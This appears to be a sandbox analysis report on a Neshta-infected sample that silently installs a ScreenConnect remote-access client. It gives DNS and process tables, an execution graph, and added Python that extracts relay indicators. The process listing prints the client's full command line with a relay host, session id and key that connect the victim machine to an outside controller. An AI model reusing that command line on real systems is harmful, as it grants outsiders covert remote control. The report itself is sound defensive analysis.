Oct 1, 2021 21:54:08.418592930 CEST | 8.8.8.8 | 192.168.2.4 | 0x2bd | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:54:08.418592930 CEST | 8.8.8.8 | 192.168.2.4 | 0x2bd | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
Oct 1, 2021 21:55:25.048744917 CEST | 8.8.8.8 | 192.168.2.4 | 0x7e4f | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:55:25.048744917 CEST | 8.8.8.8 | 192.168.2.4 | 0x7e4f | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
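
Every DNS answer above is the same two-step resolution: the relay hostname instance-qchhoo-relay.screenconnect.com is a CNAME to server-nixce85832f-relay.screenconnect.com, which resolves to 145.40.105.136, the only address the TCP table shows the sample connecting to on 443. The following Python is an added example (editor's code, not part of the Joe Sandbox report and not ScreenConnect's own code): it parses answer and packet rows in the column layout used in the tables above, follows the CNAME chain to the final address with a guard against cyclic CNAMEs, and tags each outbound 443 flow with the relay hostname it was resolved from. The hostname pattern `instance-<id>-relay.screenconnect.com` is generalized from the one name in this report and is an assumption; the sample rows are constructed from the tables, and the flow to 203.0.113.10 is a constructed negative case.

```python
import re
from collections import defaultdict

# Rows constructed from this report's DNS Answers table, in the column layout
# timestamp | src IP | dst IP | txid | reply code | name | cname | address | type.
DNS_ANSWERS = """\
Oct 1, 2021 21:51:39.189588070 CEST | 8.8.8.8 | 192.168.2.4 | 0xfc28 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME
Oct 1, 2021 21:51:39.189588070 CEST | 8.8.8.8 | 192.168.2.4 | 0xfc28 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A
Oct 1, 2021 21:52:04.613214016 CEST | 8.8.8.8 | 192.168.2.4 | 0x2d4 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME
Oct 1, 2021 21:52:04.613214016 CEST | 8.8.8.8 | 192.168.2.4 | 0x2d4 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A
"""

# Rows constructed from the TCP Packets table (timestamp | src port | dst port |
# src IP | dst IP) plus one made-up flow to 203.0.113.10 as a negative case.
TCP_PACKETS = """\
Oct 1, 2021 21:51:43.292344093 CEST | 49732 | 443 | 192.168.2.4 | 145.40.105.136
Oct 1, 2021 21:51:43.291187048 CEST | 443 | 49732 | 145.40.105.136 | 192.168.2.4
Oct 1, 2021 21:51:47.659250021 CEST | 49733 | 443 | 192.168.2.4 | 145.40.105.136
Oct 1, 2021 21:52:10.000000000 CEST | 49740 | 80 | 192.168.2.4 | 203.0.113.10
"""

# Shape of a ScreenConnect cloud relay hostname, generalized from the single name
# in this report: an assumption, not a vendor-documented pattern.
RELAY_RE = re.compile(r"^instance-[a-z0-9]+-relay\.screenconnect\.com$", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_rows(text):
    """Split pipe-delimited rows into lists of stripped fields."""
    return [[f.strip() for f in line.split("|")] for line in text.strip().splitlines()]


def build_resolution_map(dns_text):
    """name -> set of targets (CNAME target or A address) from successful answers."""
    targets = defaultdict(set)
    for _ts, _src, _dst, _txid, rcode, name, cname, addr, rtype in parse_rows(dns_text):
        if not rcode.startswith("No error"):
            continue  # NXDOMAIN / SERVFAIL rows carry no usable target
        if rtype == "CNAME":
            targets[name.lower()].add(cname.lower())
        elif rtype == "A":
            targets[name.lower()].add(addr)
    return targets


def resolve(name, targets, _seen=None):
    """Follow CNAME links to the final IPv4 addresses; a cyclic CNAME yields nothing."""
    seen = set() if _seen is None else _seen
    name = name.lower()
    if name in seen:
        return set()
    seen.add(name)
    ips = set()
    for target in targets.get(name, ()):
        if IPV4_RE.match(target):
            ips.add(target)
        else:
            ips |= resolve(target, targets, seen)
    return ips


def relay_iocs(dns_text):
    """{relay hostname: {final IPs}} for every ScreenConnect relay name answered."""
    targets = build_resolution_map(dns_text)
    return {n: resolve(n, targets) for n in targets if RELAY_RE.match(n)}


def flows_to_relays(dns_text, tcp_text):
    """Outbound packets whose destination IP was resolved from a relay hostname."""
    ip_to_names = defaultdict(set)
    for name, ips in relay_iocs(dns_text).items():
        for ip in ips:
            ip_to_names[ip].add(name)
    hits = []
    for ts, _sport, dport, sip, dip in parse_rows(tcp_text):
        if dip in ip_to_names:
            hits.append((ts, sip, dip, int(dport), sorted(ip_to_names[dip])))
    return hits


if __name__ == "__main__":
    for name, ips in relay_iocs(DNS_ANSWERS).items():
        print(f"relay {name} -> {sorted(ips)}")
    for ts, sip, dip, dport, names in flows_to_relays(DNS_ANSWERS, TCP_PACKETS):
        print(f"{ts}: {sip} -> {dip}:{dport} ({', '.join(names)})")
```

The IP alone is a weak indicator (the relay fleet is shared hosting that changes over time); the hostname, and the fact that the client re-queries it every 10 to 80 seconds while keeping short TLS sessions to it, is the durable part of this pattern.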

                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage


                                                                        Memory Usage


                                                                        High Level Behavior Distribution


                                                                        Behavior


                                                                        System Behavior

                                                                        General

                                                                        Start time:21:52:19
                                                                        Start date:01/10/2021
                                                                        Path:C:\Users\user\Desktop\$RUX313H.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\$RUX313H.exe'
                                                                        Imagebase:0x400000
                                                                        File size:4193672 bytes
                                                                        MD5 hash:08EA055B45225EC89643836BAE3C0446
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:21:52:21
                                                                        Start date:01/10/2021
                                                                        Path:C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe'
                                                                        Imagebase:0xdf0000
                                                                        File size:4152200 bytes
                                                                        MD5 hash:47264A537967C64B5651F5E2932CA18A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:21:52:25
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\svchost.com
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi'
                                                                        Imagebase:0x400000
                                                                        File size:41472 bytes
                                                                        MD5 hash:36FD5E09C417C767A952B4609D73A54B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Windows\svchost.com, Author: Joe Security
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:21:52:25
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\msiexec.exe /i C:\Users\user\AppData\Local\Temp\setup.msi
                                                                        Imagebase:0xfe0000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:21:52:26
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                        Imagebase:0x7ff777c90000
                                                                        File size:66048 bytes
                                                                        MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:21:52:27
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0182DFF70E04F7ABAC76BB82B6886C6B C
                                                                        Imagebase:0xfe0000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:21:52:27
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                        Imagebase:0x950000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:high

                                                                        General

                                                                        Start time:21:52:31
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding CB8DBADD131F30B4DC6FBBC948643C7D
                                                                        Imagebase:0xfe0000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:21:52:32
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 4E4F6FBCD6D549CE2F7F73B63973119C E Global\MSI0000
                                                                        Imagebase:0xfe0000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:21:52:32
                                                                        Start date:01/10/2021
                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-qchhoo-relay.screenconnect.com&p=443&s=da6b3e03-98fc-419f-a376-8535999f3893&k=BgIAAACkAABSU0ExAAgAAAEAAQCXhSdnV8AclTo6Qg2d%2fUagHnAuTk77VdidkN%2fHwklWj60Ukj2cjyUWF%2fyj6%2bi86j%2f4iIiD4EcKkvFNApE%2f%2fmy7V5iz8I7WLvfaBXsciWcr9yEcfZSl4AvW0iWJ2LVg8s%2bvTxK6lFGCfPmCOGop3GjLhAffGO2uiyhzZdY3cdBnrxVR1d2KV8lAELZ5VBoUfKrKrkChwusd1M6gHfzfqZEpzKJahX9yu4v97YxVChPN3WG0TWWhcEs0ZJpQzPn3g2NaZ6xL5%2bVj8rp0nPDBPjXcy%2fWFzRXbyKOD%2fA0vieIxBiRLOIqNVTkIntBIZAUsEi%2bi0gvAM%2f6xLcwwLQe0K7rN'
                                                                        Imagebase:0x3f0000
                                                                        File size:90504 bytes
                                                                        MD5 hash:79EC78769BF8092719B0E72B174BAB54
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1207076385.0000000003DB2000.00000002.00020000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:21:52:37
                                                                        Start date:01/10/2021
                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe' 'RunRole' 'c39657e2-0cc8-4a24-afd0-5db7dcfd0e5b' 'User'
                                                                        Imagebase:0x920000
                                                                        File size:529288 bytes
                                                                        MD5 hash:5597916ED66980D09C38DD206054CD6F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.1187139644.0000000000922000.00000002.00020000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.1203004972.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000000.699734443.0000000000922000.00000002.00020000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:21:52:41
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff6eb840000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:21:52:52
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff6eb840000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:21:53:05
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff6eb840000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis


                                                                          Execution Graph

                                                                          Execution Coverage:10.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:3.8%
                                                                          Total number of Nodes:927
                                                                          Total number of Limit Nodes:9

                                                                          Graph

10337->10344 10338->10349 10361 403634 10338->10361 10339->10349 10340->10349 10354 4035a0 10341->10354 10357 4035b8 10342->10357 10343->10349 10350 40364c 13 API calls 10343->10350 10348 4036f0 10344->10348 10353 40367a 10344->10353 10348->10349 10366 403600 10348->10366 10349->10230 10350->10343 10352 403b30 13 API calls 10352->10353 10353->10349 10353->10352 10355 4035b4 10354->10355 10356 4035a6 SysFreeString 10354->10356 10355->10349 10356->10355 10358 4035be 10357->10358 10359 4035c4 SysFreeString 10358->10359 10360 4035d6 10358->10360 10359->10358 10360->10349 10362 403644 10361->10362 10363 40363d 10361->10363 10364 402530 11 API calls 10362->10364 10363->10338 10365 40364b 10364->10365 10365->10338 10367 403612 10366->10367 10368 40364c 13 API calls 10367->10368 10369 40362b 10367->10369 10368->10367 10369->10348 10370->10093 10371->10091 10374 405d3b 10372->10374 10373 403184 25 API calls 10375 405d5f 10373->10375 10374->10373 10375->10103 10376->10107 10378 404f24 10377->10378 10379 4031c4 25 API calls 10378->10379 10380 404f30 10379->10380 10381 404700 10380->10381 10382 4030e8 25 API calls 10381->10382 10383 404708 10382->10383 10384 40345c 25 API calls 10383->10384 10385 40470e 10384->10385 10385->9618 10387 40325c 10386->10387 10388 4032bd 10386->10388 10389 403264 10387->10389 10390 4030e8 10387->10390 10389->10388 10391 403273 10389->10391 10395 4030e8 25 API calls 10389->10395 10394 403158 25 API calls 10390->10394 10396 4030fc 10390->10396 10393 403158 25 API calls 10391->10393 10392 40312a 10392->9620 10398 40328d 10393->10398 10394->10396 10395->10391 10396->10392 10397 402468 11 API calls 10396->10397 10397->10392 10399 4030e8 25 API calls 10398->10399 10400 4032b9 10399->10400 10400->9620 10402 407bdd 10401->10402 10403 406fe4 25 API calls 10402->10403 10408 407c35 10403->10408 10404 407d6c 10405 403094 11 API calls 10404->10405 10406 407d84 10405->10406 10407 403094 11 API calls 10406->10407 10409 407d8c 10407->10409 10408->10404 10432 
407ad0 10408->10432 10409->9629 10411 407c61 10412 407130 15 API calls 10411->10412 10413 407c69 10412->10413 10413->10404 10414 407c71 10413->10414 10415 407c79 GetFileAttributesA 10414->10415 10416 407c95 10415->10416 10417 407c8d SetFileAttributesA 10415->10417 10450 405b84 10416->10450 10417->10416 10419 407c9d 10419->9629 10421 406f5c 10420->10421 10422 403094 11 API calls 10420->10422 10423 404ae8 27 API calls 10421->10423 10422->10421 10426 406f75 10423->10426 10424 406fa0 10427 403534 25 API calls 10424->10427 10425 4049d0 27 API calls 10425->10426 10426->10424 10426->10425 10428 4032cc 25 API calls 10426->10428 10429 406fb1 10427->10429 10428->10426 10430 403094 11 API calls 10429->10430 10431 406fc6 10430->10431 10431->9635 10433 407ae6 10432->10433 10434 405c80 25 API calls 10433->10434 10435 407af9 10434->10435 10436 404f90 26 API calls 10435->10436 10437 407b12 10436->10437 10438 403214 25 API calls 10437->10438 10439 407b31 10438->10439 10440 405e04 29 API calls 10439->10440 10442 407b3c 10440->10442 10441 407b55 10443 404f90 26 API calls 10441->10443 10442->10441 10457 405cac 10442->10457 10445 407b5d 10443->10445 10446 403214 25 API calls 10445->10446 10447 407b7c 10446->10447 10448 405e50 29 API calls 10447->10448 10449 407b87 10448->10449 10449->10411 10451 4059a8 25 API calls 10450->10451 10452 405b93 10451->10452 10453 404b9c GetFileAttributesA 10452->10453 10454 405bb6 10453->10454 10455 404b68 CreateFileA 10454->10455 10456 405bd1 10455->10456 10456->10419 10460 405dc4 10457->10460 10459 405cb7 10459->10441 10461 405dcf 10460->10461 10463 405dd4 10460->10463 10462 40456c 25 API calls 10461->10462 10462->10463 10464 402448 25 API calls 10463->10464 10465 405de5 10464->10465 10465->10459 10467 4031c4 25 API calls 10466->10467 10468 404c27 10467->10468 10469 404b68 CreateFileA 10468->10469 10470 404c34 10469->10470 10471 404c50 10470->10471 10472 404be0 WriteFile 10470->10472 10474 403094 11 API calls 10471->10474 10473 404c47 10472->10473 10488 
404b90 CloseHandle 10473->10488 10476 404c65 10474->10476 10476->9660 10478 40340c 10477->10478 10479 405772 RegOpenKeyExA 10478->10479 10480 40577d 10479->10480 10480->9663 10482 405799 10481->10482 10484 4057c0 10481->10484 10483 4057b5 RegSetValueExA 10482->10483 10483->10484 10485 4057cc 10484->10485 10486 4057d0 RegCloseKey 10485->10486 10487 4057d6 10485->10487 10486->10487 10487->9658 10488->10471 10490 405008 26 API calls 10489->10490 10491 406ebb 10490->10491 10492 403214 25 API calls 10491->10492 10493 406eda 10492->10493 10494 404c78 28 API calls 10493->10494 10495 406eef 10494->10495 10496 406ef3 10495->10496 10497 406f07 10495->10497 10534 4057d8 GetLocalTime 10496->10534 10499 4030b8 11 API calls 10497->10499 10501 406f21 10499->10501 10500 406ef8 10500->10497 10501->9672 10502->9676 10504 406dd5 10503->10504 10505 406de3 10504->10505 10506 406d79 GetDriveTypeA 10504->10506 10508 403094 11 API calls 10505->10508 10507 406d93 10506->10507 10507->10504 10510 4031b4 25 API calls 10507->10510 10511 403214 25 API calls 10507->10511 10509 406dfb 10508->10509 10509->9683 10510->10507 10511->10507 10513 4074cd 10512->10513 10536 4052ac 10513->10536 10515 407569 10517 4030b8 11 API calls 10515->10517 10516 4074fa 10516->10515 10519 405338 25 API calls 10516->10519 10520 403258 25 API calls 10516->10520 10521 4074b4 112 API calls 10516->10521 10522 4071d0 108 API calls 10516->10522 10518 40758a 10517->10518 10518->9683 10519->10516 10520->10516 10521->10516 10522->10516 10524 4057d8 GetLocalTime 10523->10524 10525 406e2d 10524->10525 10526 405008 26 API calls 10525->10526 10527 406e39 10526->10527 10528 403214 25 API calls 10527->10528 10529 406e58 10528->10529 10530 404bf8 28 API calls 10529->10530 10531 406e6d 10530->10531 10532 4030b8 11 API calls 10531->10532 10533 406e87 ReleaseMutex 10532->10533 10533->9671 10535 4057f0 10534->10535 10535->10500 10537 4044f8 25 API calls 10536->10537 10538 4052c3 10537->10538 10541 405634 10538->10541 10540 4052d1 
10540->10516 10567 4052d8 10541->10567 10544 40456c 25 API calls 10545 405646 10544->10545 10546 4030e8 25 API calls 10545->10546 10547 405653 10546->10547 10548 404db8 25 API calls 10547->10548 10549 405746 10547->10549 10550 40566a 10548->10550 10549->10540 10552 405c80 25 API calls 10550->10552 10560 405699 10550->10560 10554 405676 10552->10554 10553 4056bc 10555 403258 25 API calls 10553->10555 10558 405cac 25 API calls 10554->10558 10556 4056ca 10555->10556 10557 4044a8 11 API calls 10556->10557 10559 4056cf FindFirstFileA 10557->10559 10558->10560 10561 403094 11 API calls 10559->10561 10571 405300 10560->10571 10566 4056e5 10561->10566 10563 405735 FindNextFileA 10564 405740 FindClose 10563->10564 10563->10566 10564->10549 10565 402448 25 API calls 10565->10566 10566->10549 10566->10563 10566->10565 10579 40536c 10566->10579 10568 4052e5 10567->10568 10569 4052df 10567->10569 10568->10544 10590 40458c 10569->10590 10572 4030e8 25 API calls 10571->10572 10576 403184 10572->10576 10573 405319 10573->10553 10574 403158 25 API calls 10575 403194 10574->10575 10577 403094 11 API calls 10575->10577 10576->10573 10576->10574 10578 4031ac 10577->10578 10578->10553 10582 4053ca 10579->10582 10580 4030b8 11 API calls 10581 405610 10580->10581 10581->10566 10583 4031c4 25 API calls 10582->10583 10587 405553 10582->10587 10588 405419 10582->10588 10583->10588 10584 4055a1 10585 4031c4 25 API calls 10584->10585 10584->10587 10585->10587 10586 4031c4 25 API calls 10586->10588 10587->10580 10588->10584 10588->10586 10588->10587 10589 404894 26 API calls 10588->10589 10589->10588 10591 4045ac 10590->10591 10593 404590 10590->10593 10591->10568 10592 402468 11 API calls 10592->10593 10593->10591 10593->10592 10594 4078a6 10595 4049d0 27 API calls 10594->10595 10596 4078b3 10595->10596 10597 404eec 25 API calls 10596->10597 10598 4078c4 10597->10598 10599 4078cf SetCurrentDirectoryA 10598->10599 10600 406f34 27 API calls 10599->10600 10601 4078e6 10600->10601 10602 405008 26 
API calls 10601->10602 10603 4078fd 10602->10603 10604 4049d0 27 API calls 10603->10604 10605 40792b 10604->10605 10614 404ed0 10605->10614 10608 4032cc 25 API calls 10609 407952 10608->10609 10610 40795d ShellExecuteA 10609->10610 10611 40797b 10610->10611 10612 4030b8 11 API calls 10611->10612 10613 40798b 10612->10613 10615 404edd 10614->10615 10616 4031c4 25 API calls 10615->10616 10617 404eeb 10616->10617 10617->10608
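The execution graph above is exported as a flat token stream: a node is `<id> <address>` followed by the API names (or external addresses such as 72E7AC50) called in that node, `<n> API calls` summarises a callee that is expanded elsewhere in the graph, and `<a>-><b>` is an edge. The question an analyst actually asks of such a dump is which Win32 APIs a given function can reach. The following Python, added here and not part of the Joe Sandbox report, parses the stream and answers that by walking the edges. The token grammar is inferred from the text on this page (node ids are short decimals, image addresses are 6 to 8 hex digits), and the sample is a verbatim excerpt of the FindFirstFileA and registry nodes above.

```python
import re
from collections import defaultdict

# Constructed sample: a verbatim excerpt of the execution-graph text above,
# covering the FindFirstFileA loop (nodes 10553..10579) and the registry
# write (nodes 10478..10487).
SAMPLE_GRAPH = (
    "10553 4056bc 10555 403258 25 API calls 10553->10555 10556 4056ca "
    "10555->10556 10557 4044a8 11 API calls 10556->10557 10559 4056cf "
    "FindFirstFileA 10557->10559 10558->10560 10561 403094 11 API calls "
    "10559->10561 10571 405300 10560->10571 10566 4056e5 10561->10566 "
    "10563 405735 FindNextFileA 10564 405740 FindClose 10563->10564 "
    "10563->10566 10564->10549 10565 402448 25 API calls 10565->10566 "
    "10566->10549 10566->10563 10566->10565 10579 40536c 10566->10579 "
    "10478 40340c 10477->10478 10479 405772 RegOpenKeyExA 10478->10479 "
    "10480 40577d 10479->10480 10480->9663 10482 405799 10481->10482 "
    "10484 4057c0 10481->10484 10483 4057b5 RegSetValueExA 10482->10483 "
    "10483->10484 10485 4057cc 10484->10485 10486 4057d0 RegCloseKey "
    "10485->10486 10487 4057d6 10485->10487 10486->10487 10487->9658"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9A-Fa-f]{6,8}$")  # 40xxxx in-image, 72E7xxxx external


def is_node_id(tok):
    """Node ids are short decimal numbers; a 6-digit all-decimal token such as
    403184 is an image address, so the token length decides the ambiguity."""
    return tok.isdigit() and len(tok) <= 5


def parse_graph(text):
    """Return (nodes, edges). nodes[id] = {"addr", "apis", "api_calls"};
    edges[id] = set of successor node ids."""
    nodes, edges = {}, defaultdict(set)
    toks = text.split()
    i, current = 0, None
    while i < len(toks):
        tok = toks[i]
        m = EDGE.match(tok)
        if m:
            edges[int(m.group(1))].add(int(m.group(2)))
            i += 1
        elif is_node_id(tok) and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": int(toks[i + 1], 16), "apis": [], "api_calls": 0}
            i += 2
        elif current is None:
            i += 1                                   # stray token before the first node
        elif tok.isdigit() and toks[i + 1:i + 3] == ["API", "calls"]:
            nodes[current]["api_calls"] = int(tok)   # summarised callee, expanded elsewhere
            i += 3
        else:
            nodes[current]["apis"].append(tok)       # API name or external address
            i += 1
    return nodes, dict(edges)


def reachable_apis(nodes, edges, start):
    """Depth-first walk from `start`; API names in first-seen order."""
    seen, stack, apis = set(), [start], []
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        for api in nodes.get(n, {}).get("apis", []):
            if api not in apis:
                apis.append(api)
        stack.extend(sorted(edges.get(n, ()), reverse=True))
    return apis


if __name__ == "__main__":
    graph_nodes, graph_edges = parse_graph(SAMPLE_GRAPH)
    for start in (10553, 10478, 10481):
        print(start, "->", reachable_apis(graph_nodes, graph_edges, start))
```

Starting from node 10553 (0x4056BC, inside the directory-walk routine listed under Executed Functions) the walk yields FindFirstFileA, FindNextFileA and FindClose; from 10481 it yields RegSetValueExA and RegCloseKey. Nodes that only carry an `N API calls` summary (403258, 4044a8, 403094, 402448 in the excerpt) contribute nothing to the list, so a complete answer needs the whole dump, not just the excerpt.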

                                                                          Executed Functions

                                                                          Control-flow Graph

Basic blocks of E00405634 (block id, address range, calls, successor blocks):

• 251  405634-405659  call 4052d8, 40456c, 4030e8  -> 258, 259
• 258  40574c-405759  call 404520
• 259  40565f-40566f  call 404db8  -> 264, 265
• 264  405671-40568a  call 405c80, 4048d8  -> 274, 275
• 265  4056a9-4056e7  call 405300, 403258, 4044a8, FindFirstFileA, 403094  -> 282, 283
• 274  405691-405699  call 405cac  -> 265
• 275  40568c  -> 274
• 282  405746  -> 258
• 283  4056e9-4056fc  call 40536c  -> 286, 287
• 286  405735-40573e  FindNextFileA  -> 283, 290
• 287  4056fe-405701  -> 288, 289
• 288  405703-405713  -> 286, 294
• 289  405717-405730  call 402448, 4045e8, 40254c  -> 286
• 290  405740-405741  FindClose  -> 282
• 294  405715  -> 282, 289
                                                                          C-Code - Quality: 60%
                                                                          			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                          				char _v292;
                                                                          				char _v336;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __ebp;
                                                                          				CHAR* _t38;
                                                                          				void* _t39;
                                                                          				int _t45;
                                                                          				intOrPtr _t56;
                                                                          				intOrPtr _t57;
                                                                          				void* _t58;
                                                                          				void* _t60;
                                                                          				void* _t63;
                                                                          				void* _t69;
                                                                          				void* _t70;
                                                                          				void* _t80;
                                                                          				void* _t82;
                                                                          				void* _t83;
                                                                          				void* _t84;
                                                                          				void* _t85;
                                                                          				void* _t86;
